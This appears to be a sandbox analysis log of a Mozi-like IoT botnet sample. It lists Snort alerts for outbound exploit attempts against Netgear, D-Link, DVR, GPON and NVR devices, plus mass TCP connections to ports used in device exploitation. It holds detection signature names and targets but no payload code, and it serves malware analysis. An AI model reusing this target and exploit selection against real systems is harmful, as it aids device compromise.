Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42764 -> 187.157.44.71:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42764 -> 187.157.44.71:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44958 -> 161.71.2.41:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44958 -> 161.71.2.41:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:57962 -> 52.48.108.30:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:57962 -> 52.48.108.30:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:57962 -> 52.48.108.30:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.8.220.39:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.8.220.39:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48916 -> 207.154.230.111:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58348 -> 52.232.110.39:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58348 -> 52.232.110.39:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:42558 -> 18.66.0.94:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:42558 -> 18.66.0.94:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:42558 -> 18.66.0.94:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:53338 -> 185.199.110.112:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50360 -> 114.207.251.137:8080 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50360 -> 114.207.251.137:8080 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50360 -> 114.207.251.137:8080 |
Source: Traffic | Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:52454 -> 92.118.26.58:81 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.249.27:6776 -> 192.168.2.23:15453 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.213.248:51492 -> 192.168.2.23:15453 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 88.129.242.254:6231 -> 192.168.2.23:15453 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 201.150.176.65:4000 -> 192.168.2.23:15453 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 122.155.0.70:8083 -> 192.168.2.23:15453 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.93:58568 -> 192.168.2.23:15453 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:44758 -> 195.54.163.58:8080 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:44758 -> 195.54.163.58:8080 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50434 -> 172.247.38.144:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50434 -> 172.247.38.144:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50434 -> 172.247.38.144:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:46296 -> 52.73.33.104:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34978 -> 98.156.8.112:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:34978 -> 98.156.8.112:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59926 -> 83.142.198.185:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59926 -> 83.142.198.185:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46902 -> 192.186.22.190:5555 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45500 -> 185.196.100.153:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45500 -> 185.196.100.153:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48868 -> 23.12.89.25:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48868 -> 23.12.89.25:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.89.25:80 -> 192.168.2.23:48868 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59780 -> 35.173.167.250:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59780 -> 35.173.167.250:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59780 -> 35.173.167.250:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:45038 -> 104.15.240.53:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:45038 -> 104.15.240.53:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:45038 -> 104.15.240.53:80 |
Source: Traffic | Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49312 -> 50.16.188.25:8080 |
Source: Traffic | Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:47290 -> 52.29.6.66:8080 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32802 -> 184.25.176.127:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32802 -> 184.25.176.127:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.25.176.127:80 -> 192.168.2.23:32802 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:34974 -> 13.125.149.49:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:34974 -> 13.125.149.49:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:34974 -> 13.125.149.49:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40888 -> 185.133.229.74:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40888 -> 185.133.229.74:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40888 -> 185.133.229.74:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.34.61:80 -> 192.168.2.23:39122 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:39122 -> 23.208.34.61:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49458 -> 23.230.254.105:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49458 -> 23.230.254.105:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49458 -> 23.230.254.105:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:33740 -> 190.166.198.45:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:35218 -> 3.20.201.243:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36392 -> 200.123.205.169:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36392 -> 200.123.205.169:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.101.170.129:80 -> 192.168.2.23:48328 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55072 -> 34.98.66.83:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55072 -> 34.98.66.83:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:32900 -> 118.163.113.176:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:32900 -> 118.163.113.176:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:32900 -> 118.163.113.176:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:47072 -> 52.72.158.238:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:48156 -> 143.204.112.212:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:48156 -> 143.204.112.212:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:48156 -> 143.204.112.212:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41860 -> 13.238.47.38:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41860 -> 13.238.47.38:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50568 -> 210.48.20.7:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50568 -> 210.48.20.7:80 |
Source: Traffic | Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58468 -> 24.8.179.115:8080 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48184 -> 54.84.181.34:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.233.170:80 -> 192.168.2.23:60644 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49404 -> 42.98.215.127:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49404 -> 42.98.215.127:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55652 -> 45.144.3.201:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55652 -> 45.144.3.201:80 |
Source: Traffic | Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49182 -> 185.233.83.88:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49182 -> 185.233.83.88:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49182 -> 185.233.83.88:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:56410 -> 178.135.100.61:8080 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:56410 -> 178.135.100.61:8080 |
Source: Traffic | Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49116 -> 149.104.79.70:8080 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:38106 -> 2.178.219.63:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:60644 -> 23.208.233.170:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:45792 -> 52.4.18.169:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48328 -> 104.101.170.129:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48818 -> 64.34.159.178:80 |
Source: global traffic | TCP traffic: 25.187.113.148 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 173.124.45.94 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 9.115.138.146 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 176.13.132.57 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 93.125.7.219 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 210.67.192.146 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 74.40.185.41 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 209.59.13.236 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 185.229.210.149 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 88.80.204.55 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 53.170.157.130 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 43.159.190.154 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 214.222.104.45 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 193.151.195.55 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 17.252.58.84 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 84.231.13.28 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 130.173.40.235 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 150.228.174.178 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 38.56.136.31 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 82.72.254.135 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 190.235.119.78 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 221.22.194.11 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 157.219.143.152 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 190.10.107.49 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 4.141.143.218 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 116.15.105.36 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 158.20.189.8 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 106.99.159.31 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 164.182.234.67 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 123.220.165.29 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 40.4.221.62 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 207.237.147.66 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 19.104.90.193 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 93.179.249.7 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 57.34.192.239 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 146.118.139.85 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 156.228.159.201 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 193.2.18.134 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 40.250.29.252 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 63.68.28.146 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 180.80.137.123 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 199.253.175.69 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 220.163.161.225 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 142.203.21.215 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 204.46.18.242 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 175.52.69.37 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 196.212.110.237 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 154.64.50.131 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 204.222.113.90 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 79.158.209.144 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 30.183.116.123 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 199.240.101.94 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 208.220.131.137 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 156.79.252.244 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 135.15.153.186 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 198.245.112.146 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 189.5.17.154 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 207.23.195.29 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 130.245.77.217 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 54.181.148.41 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 42.217.20.173 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 163.125.119.193 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 50.183.64.105 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 15.101.151.43 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 164.113.140.76 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 186.104.158.59 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 218.136.34.104 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 69.235.123.21 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 180.24.184.106 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 106.207.31.42 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 176.107.239.103 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 16.191.137.51 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 145.40.158.93 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 148.234.153.158 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 190.36.150.101 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 187.123.230.15 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 52.68.173.169 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 164.97.186.164 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 62.124.228.151 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 168.170.73.87 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 194.105.25.217 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 144.181.144.68 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 216.128.208.88 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 132.25.8.225 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 27.174.228.124 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 70.48.69.248 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 85.12.92.30 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 175.55.189.249 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 37.201.208.112 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 177.52.181.55 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 173.181.211.215 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 92.47.126.52 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 69.130.148.70 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 165.144.62.218 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 221.14.154.237 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 45.238.205.88 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 33.104.165.118 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 57.82.230.159 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 108.102.15.248 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 170.248.31.222 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 141.39.142.235 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 149.209.199.38 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 136.135.67.3 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 214.223.72.186 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 104.219.63.182 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 98.1.76.193 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 189.97.112.66 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 154.3.70.165 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 66.144.204.153 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 30.105.245.140 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 9.31.180.218 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 202.86.252.99 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 9.3.250.91 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 131.143.33.147 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 1.186.104.107 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 159.53.131.234 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 154.74.21.50 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 168.240.219.165 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 51.187.225.124 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 25.215.228.98 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 80.165.24.201 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 116.182.89.143 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 73.87.35.147 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 155.59.30.234 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 72.173.127.108 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 44.87.62.109 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 86.84.186.192 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 192.168.2.23:35306 -> 205.124.213.207:81 |
Source: global traffic | TCP traffic: 192.168.2.23:39528 -> 153.229.65.202:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:41028 -> 6.10.246.119:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:47876 -> 196.212.110.237:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:46608 -> 78.233.217.54:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:41374 -> 173.124.45.94:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:59080 -> 217.132.116.242:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:48488 -> 220.50.66.153:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:58574 -> 68.208.81.105:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:50322 -> 138.183.57.233:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:33110 -> 76.69.130.42:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:43134 -> 159.48.209.196:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:33008 -> 154.37.153.102:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:59876 -> 137.50.209.196:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:49408 -> 170.247.26.46:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:48922 -> 130.245.77.217:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:47956 -> 170.248.31.222:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:43910 -> 68.69.157.29:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:58090 -> 199.253.175.69:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:44844 -> 199.240.101.94:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:35854 -> 33.160.138.35:81 |
Source: global traffic | TCP traffic: 192.168.2.23:34058 -> 29.14.250.60:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:54756 -> 173.212.119.218:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:38088 -> 42.217.20.173:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:60968 -> 43.190.131.125:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:37876 -> 50.248.206.34:81 |
Source: global traffic | TCP traffic: 192.168.2.23:40322 -> 4.143.102.140:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:36922 -> 27.174.228.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:55106 -> 112.81.89.51:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:41068 -> 129.241.209.154:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:49660 -> 68.252.36.133:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:34462 -> 221.149.172.42:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:37384 -> 110.152.254.222:81 |
Source: global traffic | TCP traffic: 192.168.2.23:58442 -> 189.97.112.66:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:43052 -> 87.235.240.17:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:51466 -> 201.214.117.34:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:44722 -> 9.171.24.117:81 |
Source: global traffic | TCP traffic: 192.168.2.23:41400 -> 186.104.158.59:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:56728 -> 19.55.75.43:81 |
Source: global traffic | TCP traffic: 192.168.2.23:37456 -> 162.23.204.195:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:53214 -> 18.118.102.95:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:53812 -> 154.64.50.131:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:60714 -> 215.181.175.56:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:46184 -> 148.234.153.158:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:35944 -> 221.22.194.11:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:45842 -> 19.172.197.250:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:47804 -> 80.224.60.31:81 |
Source: global traffic | TCP traffic: 192.168.2.23:38922 -> 132.25.8.225:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:46864 -> 71.246.136.80:81 |
